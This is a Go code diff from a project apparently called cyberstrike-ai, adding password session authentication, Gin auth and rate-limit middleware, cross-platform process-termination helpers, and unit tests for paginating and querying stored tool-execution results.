// tenant_key + 稳定用户标识(user_id/open_id/union_id);按配置可选 chat_id 兜底。
func resolveLarkUserID(event *larkim.P2MessageReceiveV1, allowChatIDFallback bool) string {
if event == nil || event.Event == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil {
return ""
}
tenantKey := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.TenantKey))
if tenantKey == "" {
tenantKey = "default"
}
prefix := "t:" + tenantKey + "|"
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UserId)); id != "" {
return prefix + "u:" + id
}
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.OpenId)); id != "" {
return prefix + "o:" + id
}
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UnionId)); id != "" {
return prefix + "n:" + id
}
if allowChatIDFallback && event.Event.Message != nil {
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Message.ChatId)); id != "" {
return prefix + "c:" + id
}
}
return ""
}
+132
View File
@@ -0,0 +1,132 @@
package security
import (
"errors"
"strings"
"sync"
"time"
"github.com/google/uuid"
)
// Predefined errors for authentication operations.
var (
ErrInvalidPassword = errors.New("invalid password")
)
// Session represents an authenticated user session.
type Session struct {
Token string
ExpiresAt time.Time
}
// AuthManager manages password-based authentication and session lifecycle.
type AuthManager struct {
password string
sessionDuration time.Duration
mu sync.RWMutex
sessions map[string]Session
}
// NewAuthManager creates a new AuthManager instance.
func NewAuthManager(password string, sessionDurationHours int) (*AuthManager, error) {
if strings.TrimSpace(password) == "" {
return nil, errors.New("auth password must be configured")
}
if sessionDurationHours <= 0 {
sessionDurationHours = 12
}
return &AuthManager{
password: password,
sessionDuration: time.Duration(sessionDurationHours) * time.Hour,
sessions: make(map[string]Session),
}, nil
}
// Authenticate validates the password and creates a new session.
func (a *AuthManager) Authenticate(password string) (string, time.Time, error) {
if password != a.password {
return "", time.Time{}, ErrInvalidPassword
}
token := uuid.NewString()
expiresAt := time.Now().Add(a.sessionDuration)
a.mu.Lock()
a.sessions[token] = Session{
Token: token,
ExpiresAt: expiresAt,
}
a.mu.Unlock()
return token, expiresAt, nil
}
// ValidateToken checks whether the provided token is still valid.
func (a *AuthManager) ValidateToken(token string) (Session, bool) {
if strings.TrimSpace(token) == "" {
return Session{}, false
}
a.mu.RLock()
session, ok := a.sessions[token]
a.mu.RUnlock()
if !ok {
return Session{}, false
}
if time.Now().After(session.ExpiresAt) {
a.mu.Lock()
delete(a.sessions, token)
a.mu.Unlock()
return Session{}, false
}
return session, true
}
// CheckPassword verifies whether the provided password matches the current password.
func (a *AuthManager) CheckPassword(password string) bool {
a.mu.RLock()
defer a.mu.RUnlock()
return password == a.password
}
// RevokeToken invalidates the specified token.
func (a *AuthManager) RevokeToken(token string) {
if strings.TrimSpace(token) == "" {
return
}
a.mu.Lock()
delete(a.sessions, token)
a.mu.Unlock()
}
// SessionDurationHours returns the configured session duration in hours.
func (a *AuthManager) SessionDurationHours() int {
return int(a.sessionDuration / time.Hour)
}
// UpdateConfig updates the password and session duration, revoking existing sessions.
func (a *AuthManager) UpdateConfig(password string, sessionDurationHours int) error {
password = strings.TrimSpace(password)
if password == "" {
return errors.New("auth password must be configured")
}
if sessionDurationHours <= 0 {
sessionDurationHours = 12
}
a.mu.Lock()
defer a.mu.Unlock()
a.password = password
a.sessionDuration = time.Duration(sessionDurationHours) * time.Hour
a.sessions = make(map[string]Session)
return nil
}
+51
View File
@@ -0,0 +1,51 @@
package security
import (
"net/http"
"strings"
"github.com/gin-gonic/gin"
)
const (
ContextAuthTokenKey = "authToken"
ContextSessionExpiry = "authSessionExpiry"
)
// AuthMiddleware enforces authentication on protected routes.
func AuthMiddleware(manager *AuthManager) gin.HandlerFunc {
return func(c *gin.Context) {
token := extractTokenFromRequest(c)
session, ok := manager.ValidateToken(token)
if !ok {
c.AbortWithStatusJSON(http.StatusUnauthorized, gin.H{
"error": "未授权访问,请先登录",
})
return
}
c.Set(ContextAuthTokenKey, session.Token)
c.Set(ContextSessionExpiry, session.ExpiresAt)
c.Next()
}
}
func extractTokenFromRequest(c *gin.Context) string {
authHeader := c.GetHeader("Authorization")
if authHeader != "" {
if len(authHeader) > 7 && strings.EqualFold(authHeader[0:7], "Bearer ") {
return strings.TrimSpace(authHeader[7:])
}
return strings.TrimSpace(authHeader)
}
if token := c.Query("token"); token != "" {
return strings.TrimSpace(token)
}
if cookie, err := c.Cookie("auth_token"); err == nil {
return strings.TrimSpace(cookie)
}
return ""
}
+1597
View File
File diff suppressed because it is too large Load Diff
+290
View File
@@ -0,0 +1,290 @@
package security
import (
"context"
"os"
"path/filepath"
"strings"
"testing"
"time"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/storage"
"go.uber.org/zap"
)
// setupTestExecutor 创建测试用的执行器
func setupTestExecutor(t *testing.T) (*Executor, *mcp.Server) {
logger := zap.NewNop()
mcpServer := mcp.NewServer(logger)
cfg := &config.SecurityConfig{
Tools: []config.ToolConfig{},
}
executor := NewExecutor(cfg, mcpServer, logger)
return executor, mcpServer
}
// setupTestStorage 创建测试用的存储
func setupTestStorage(t *testing.T) *storage.FileResultStorage {
tmpDir := filepath.Join(os.TempDir(), "test_executor_storage_"+time.Now().Format("20060102_150405"))
logger := zap.NewNop()
storage, err := storage.NewFileResultStorage(tmpDir, logger)
if err != nil {
t.Fatalf("创建测试存储失败: %v", err)
}
return storage
}
func TestExecutor_ExecuteInternalTool_QueryExecutionResult(t *testing.T) {
executor, _ := setupTestExecutor(t)
testStorage := setupTestStorage(t)
executor.SetResultStorage(testStorage)
// 准备测试数据
executionID := "test_exec_001"
toolName := "nmap_scan"
result := "Line 1: Port 22 open\nLine 2: Port 80 open\nLine 3: Port 443 open\nLine 4: error occurred"
// 保存测试结果
err := testStorage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存测试结果失败: %v", err)
}
ctx := context.Background()
// 测试1: 基本查询(第一页)
args := map[string]interface{}{
"execution_id": executionID,
"page": float64(1),
"limit": float64(2),
}
toolResult, err := executor.executeQueryExecutionResult(ctx, args)
if err != nil {
t.Fatalf("执行查询失败: %v", err)
}
if toolResult.IsError {
t.Fatalf("查询应该成功,但返回了错误: %s", toolResult.Content[0].Text)
}
// 验证结果包含预期内容
resultText := toolResult.Content[0].Text
if !strings.Contains(resultText, executionID) {
t.Errorf("结果中应该包含执行ID: %s", executionID)
}
if !strings.Contains(resultText, "第 1/") {
t.Errorf("结果中应该包含分页信息")
}
// 测试2: 搜索功能
args2 := map[string]interface{}{
"execution_id": executionID,
"search": "error",
"page": float64(1),
"limit": float64(10),
}
toolResult2, err := executor.executeQueryExecutionResult(ctx, args2)
if err != nil {
t.Fatalf("执行搜索失败: %v", err)
}
if toolResult2.IsError {
t.Fatalf("搜索应该成功,但返回了错误: %s", toolResult2.Content[0].Text)
}
resultText2 := toolResult2.Content[0].Text
if !strings.Contains(resultText2, "error") {
t.Errorf("搜索结果中应该包含关键词: error")
}
// 测试3: 过滤功能
args3 := map[string]interface{}{
"execution_id": executionID,
"filter": "Port",
"page": float64(1),
"limit": float64(10),
}
toolResult3, err := executor.executeQueryExecutionResult(ctx, args3)
if err != nil {
t.Fatalf("执行过滤失败: %v", err)
}
if toolResult3.IsError {
t.Fatalf("过滤应该成功,但返回了错误: %s", toolResult3.Content[0].Text)
}
resultText3 := toolResult3.Content[0].Text
if !strings.Contains(resultText3, "Port") {
t.Errorf("过滤结果中应该包含关键词: Port")
}
// 测试4: 缺少必需参数
args4 := map[string]interface{}{
"page": float64(1),
}
toolResult4, err := executor.executeQueryExecutionResult(ctx, args4)
if err != nil {
t.Fatalf("执行查询失败: %v", err)
}
if !toolResult4.IsError {
t.Fatal("缺少execution_id应该返回错误")
}
// 测试5: 不存在的执行ID
args5 := map[string]interface{}{
"execution_id": "nonexistent_id",
"page": float64(1),
}
toolResult5, err := executor.executeQueryExecutionResult(ctx, args5)
if err != nil {
t.Fatalf("执行查询失败: %v", err)
}
if !toolResult5.IsError {
t.Fatal("不存在的执行ID应该返回错误")
}
}
func TestExecutor_ExecuteInternalTool_UnknownTool(t *testing.T) {
executor, _ := setupTestExecutor(t)
ctx := context.Background()
args := map[string]interface{}{
"test": "value",
}
// 测试未知的内部工具类型
toolResult, err := executor.executeInternalTool(ctx, "unknown_tool", "internal:unknown_tool", args)
if err != nil {
t.Fatalf("执行内部工具失败: %v", err)
}
if !toolResult.IsError {
t.Fatal("未知的工具类型应该返回错误")
}
if !strings.Contains(toolResult.Content[0].Text, "未知的内部工具类型") {
t.Errorf("错误消息应该包含'未知的内部工具类型'")
}
}
func TestExecutor_ExecuteInternalTool_NoStorage(t *testing.T) {
executor, _ := setupTestExecutor(t)
// 不设置存储,测试未初始化的情况
ctx := context.Background()
args := map[string]interface{}{
"execution_id": "test_id",
}
toolResult, err := executor.executeQueryExecutionResult(ctx, args)
if err != nil {
t.Fatalf("执行查询失败: %v", err)
}
if !toolResult.IsError {
t.Fatal("未初始化的存储应该返回错误")
}
if !strings.Contains(toolResult.Content[0].Text, "结果存储未初始化") {
t.Errorf("错误消息应该包含'结果存储未初始化'")
}
}
func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T) {
executor, _ := setupTestExecutor(t)
// 子进程先向 stdout 写无换行字符再长时间 sleep;若与 echo $pid 共享管道且未重定向子进程 stdout,
// ReadString('\n') 会阻塞到子进程退出。后台包装须将子进程标准流与 PID 行分离。
ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second)
defer cancel()
args := map[string]interface{}{
"command": `(sh -c 'printf x; sleep 120') &`,
"shell": "sh",
}
res, err := executor.executeSystemCommand(ctx, args)
if err != nil {
t.Fatalf("executeSystemCommand: %v", err)
}
if res == nil || res.IsError {
t.Fatalf("expected success, got %+v", res)
}
txt := res.Content[0].Text
if !strings.Contains(txt, "后台命令已启动") {
t.Fatalf("unexpected body: %q", txt)
}
}
func TestPaginateLines(t *testing.T) {
lines := []string{"Line 1", "Line 2", "Line 3", "Line 4", "Line 5"}
// 测试第一页
page := paginateLines(lines, 1, 2)
if page.Page != 1 {
t.Errorf("页码不匹配。期望: 1, 实际: %d", page.Page)
}
if page.Limit != 2 {
t.Errorf("每页行数不匹配。期望: 2, 实际: %d", page.Limit)
}
if page.TotalLines != 5 {
t.Errorf("总行数不匹配。期望: 5, 实际: %d", page.TotalLines)
}
if page.TotalPages != 3 {
t.Errorf("总页数不匹配。期望: 3, 实际: %d", page.TotalPages)
}
if len(page.Lines) != 2 {
t.Errorf("第一页行数不匹配。期望: 2, 实际: %d", len(page.Lines))
}
// 测试第二页
page2 := paginateLines(lines, 2, 2)
if len(page2.Lines) != 2 {
t.Errorf("第二页行数不匹配。期望: 2, 实际: %d", len(page2.Lines))
}
if page2.Lines[0] != "Line 3" {
t.Errorf("第二页第一行不匹配。期望: Line 3, 实际: %s", page2.Lines[0])
}
// 测试最后一页
page3 := paginateLines(lines, 3, 2)
if len(page3.Lines) != 1 {
t.Errorf("第三页行数不匹配。期望: 1, 实际: %d", len(page3.Lines))
}
// 测试超出范围的页码(应该返回最后一页)
page4 := paginateLines(lines, 4, 2)
if page4.Page != 3 {
t.Errorf("超出范围的页码应该被修正为最后一页。期望: 3, 实际: %d", page4.Page)
}
if len(page4.Lines) != 1 {
t.Errorf("最后一页应该只有1行。实际: %d行", len(page4.Lines))
}
// 测试无效页码(小于1
page0 := paginateLines(lines, 0, 2)
if page0.Page != 1 {
t.Errorf("无效页码应该被修正为1。实际: %d", page0.Page)
}
// 测试空列表
emptyPage := paginateLines([]string{}, 1, 10)
if emptyPage.TotalLines != 0 {
t.Errorf("空列表的总行数应该为0。实际: %d", emptyPage.TotalLines)
}
if len(emptyPage.Lines) != 0 {
t.Errorf("空列表应该返回空结果。实际: %d行", len(emptyPage.Lines))
}
}
+31
View File
@@ -0,0 +1,31 @@
//go:build !windows
package security
import (
"os/exec"
"syscall"
)
// prepareShellCmdSession 让 shell 子进程在独立会话中运行,便于超时/取消时整组 SIGKILL(含子进程)。
func prepareShellCmdSession(cmd *exec.Cmd) error {
if cmd == nil {
return nil
}
if cmd.SysProcAttr == nil {
cmd.SysProcAttr = &syscall.SysProcAttr{}
}
cmd.SysProcAttr.Setsid = true
return nil
}
// terminateCmdTree 尽力终止 cmd 及其进程组(Unix 下 Setsid 后 PGID == 首进程 PID)。
func terminateCmdTree(cmd *exec.Cmd) {
if cmd == nil || cmd.Process == nil {
return
}
pid := cmd.Process.Pid
if err := syscall.Kill(-pid, syscall.SIGKILL); err != nil {
_ = cmd.Process.Kill()
}
}
+17
View File
@@ -0,0 +1,17 @@
//go:build windows
package security
import "os/exec"
func prepareShellCmdSession(cmd *exec.Cmd) error {
_ = cmd
return nil
}
func terminateCmdTree(cmd *exec.Cmd) {
if cmd == nil || cmd.Process == nil {
return
}
_ = cmd.Process.Kill()
}
+81
View File
@@ -0,0 +1,81 @@
package security
import (
"net/http"
"sync"
"time"
"github.com/gin-gonic/gin"
)
// rateLimitEntry 记录某个 IP 的请求窗口信息
type rateLimitEntry struct {
count int
windowAt time.Time
}
// RateLimiter 基于 IP 的滑动窗口速率限制器
type RateLimiter struct {
mu sync.Mutex
entries map[string]*rateLimitEntry
limit int // 窗口内允许的最大请求数
window time.Duration // 窗口时长
}
// NewRateLimiter 创建速率限制器
func NewRateLimiter(limit int, window time.Duration) *RateLimiter {
rl := &RateLimiter{
entries: make(map[string]*rateLimitEntry),
limit: limit,
window: window,
}
// 后台定期清理过期条目,防止内存泄漏
go rl.cleanup()
return rl
}
// cleanup 每分钟清理一次过期条目
func (rl *RateLimiter) cleanup() {
ticker := time.NewTicker(1 * time.Minute)
defer ticker.Stop()
for range ticker.C {
rl.mu.Lock()
now := time.Now()
for ip, entry := range rl.entries {
if now.Sub(entry.windowAt) > rl.window {
delete(rl.entries, ip)
}
}
rl.mu.Unlock()
}
}
// allow 检查指定 IP 是否允许通过
func (rl *RateLimiter) allow(ip string) bool {
rl.mu.Lock()
defer rl.mu.Unlock()
now := time.Now()
entry, ok := rl.entries[ip]
if !ok || now.Sub(entry.windowAt) > rl.window {
rl.entries[ip] = &rateLimitEntry{count: 1, windowAt: now}
return true
}
entry.count++
return entry.count <= rl.limit
}
// RateLimitMiddleware 返回 Gin 中间件,对超限请求返回 429
func RateLimitMiddleware(rl *RateLimiter) gin.HandlerFunc {
return func(c *gin.Context) {
ip := c.ClientIP()
if !rl.allow(ip) {
c.AbortWithStatusJSON(http.StatusTooManyRequests, gin.H{
"error": "rate limit exceeded, please try again later",
})
return
}
c.Next()
}
}